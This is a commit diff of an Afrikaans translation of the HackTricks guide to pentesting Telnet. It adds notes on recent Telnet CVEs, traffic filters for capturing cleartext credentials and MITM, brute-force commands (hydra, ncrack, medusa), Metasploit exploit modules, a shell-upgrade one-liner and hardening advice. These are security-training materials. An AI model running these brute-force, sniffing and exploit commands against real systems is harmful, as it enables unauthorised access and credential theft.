Translated ['src/network-services-pentesting/pentesting-telnet.md'] to a

This commit is contained in:
Translator 2025-07-13 21:25:04 +00:00
parent 29eb4e712a
commit a27da66908

View File

@ -23,13 +23,13 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
Die skrip `telnet-ntlm-info.nse` sal NTLM-inligting verkry (Windows weergawes).
Van die [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In die TELNET-protokol is daar verskeie "**opsies**" wat goedgekeur sal word en gebruik kan word met die "**DO, DON'T, WILL, WON'T**" struktuur om 'n gebruiker en bediener in staat te stel om saam te stem om 'n meer uitgebreide (of dalk net verskillende) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan insluit die verandering van die karakterstel, die echo-modus, ens.
Van die [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In die TELNET-protokol is daar verskeie "**opsies**" wat goedgekeur sal word en gebruik kan word met die "**DO, DON'T, WILL, WON'T**" struktuur om 'n gebruiker en bediener toe te laat om saam te stem om 'n meer uitgebreide (of dalk net verskillende) stel konvensies vir hul TELNET-verbinding te gebruik. Sulke opsies kan insluit die verandering van die karakterstel, die echo-modus, ens.
**Ek weet dit is moontlik om hierdie opsies te tel, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.**
**Ek weet dit is moontlik om hierdie opsies te enumerate, maar ek weet nie hoe nie, so laat weet my as jy weet hoe.**
### [Brute force](../generic-hacking/brute-force.md#telnet)
## Konfigurasie-lêer
## Konfigurasie lêer
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
@ -67,4 +67,60 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
{{#include ../banners/hacktricks-training.md}}
### Onlangse Kwetsbaarhede (2022-2025)
* **CVE-2024-45698 D-Link Wi-Fi 6 routers (DIR-X4860)**: Die ingeboude Telnet-diens het hard-gecodeerde akrediteerbesonderhede aanvaar en het gefaal om invoer te saniteer, wat ongeverifieerde afstandlike RCE as root via vervaardigde opdragte op poort 23 moontlik gemaak het. Reggestel in firmware ≥ 1.04B05.
* **CVE-2023-40478 NETGEAR RAX30**: Stapel-gebaseerde buffer oorgeloop in die Telnet CLI `passwd` opdrag laat 'n aangrensende aanvaller toe om verifikasie te omseil en arbitrêre kode as root uit te voer.
* **CVE-2022-39028 GNU inetutils telnetd**: 'n Twee-byte reeks (`0xff 0xf7` / `0xff 0xf8`) aktiveer 'n NULL-pointer dereferensie wat `telnetd` kan laat crash, wat lei tot 'n volgehoue DoS na verskeie crashes.
Hou hierdie CVE's in gedagte tydens kwesbaarheid triage—as die teiken 'n on-gepatchte firmware of erflating inetutils Telnet daemon draai, mag jy 'n regstreekse pad na kode-uitvoering of 'n ontwrigting DoS hê.
### Sniffing Akrediteerbesonderhede & Man-in-the-Middle
Telnet stuur alles, insluitend akrediteerbesonderhede, in **duidelike teks**. Twee vinnige maniere om dit te vang:
```bash
# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'
# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)
```
Vir aktiewe MITM, kombineer ARP spoofing (bv. `arpspoof`/`ettercap`) met dieselfde snuffelfilters om wagwoorde op geswitte netwerke te versamel.
### Geoutomatiseerde Brute-force / Wagwoord Spuit
```bash
# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
```
Die meeste IoT-botnets (Mirai-variantes) skandeer steeds poort 23 met klein standaard-akkrediteringswoordeboeke—die spieël van daardie logika kan vinnig swak toestelle identifiseer.
### Exploitatie & Post-Exploitatie
Metasploit het verskeie nuttige modules:
* `auxiliary/scanner/telnet/telnet_version` banner & opsie enumerasie.
* `auxiliary/scanner/telnet/brute_telnet` multithreaded bruteforce.
* `auxiliary/scanner/telnet/telnet_encrypt_overflow` RCE teen kwesbare Solaris 9/10 Telnet (opsie ENCRYPT hantering).
* `exploit/linux/mips/netgear_telnetenable` stel telnet-diens in met 'n vervaardigde pakket op baie NETGEAR-roeters.
Nadat 'n shell verkry is, onthou dat **TTY's gewoonlik dom is**; opgradeer met `python -c 'import pty;pty.spawn("/bin/bash")'` of gebruik die [HackTricks TTY tricks](/generic-hacking/reverse-shells/full-ttys.md).
### Versterking & Ontdekking (Blou span hoek)
1. Verkies SSH en deaktiveer Telnet-diens heeltemal.
2. As Telnet vereis word, bind dit slegs aan bestuurs-VLAN's, handhaaf ACL's en verpak die daemon met TCP wrappers (`/etc/hosts.allow`).
3. Vervang erfenis `telnetd` implementasies met `ssl-telnet` of `telnetd-ssl` om vervoer-enkripsie by te voeg, maar **dit beskerm slegs data-in-transit—wachtwoord-raai bly triviaal**.
4. Monitor vir uitgaande verkeer na poort 23; kompromies genereer dikwels omgekeerde shells oor Telnet om streng-HTTP-uitgangfilters te omseil.
## Verwysings
* D-Link Advisory CVE-2024-45698 Kritieke Telnet RCE.
* NVD CVE-2022-39028 inetutils `telnetd` DoS.
{{#include /banners/hacktricks-training.md}}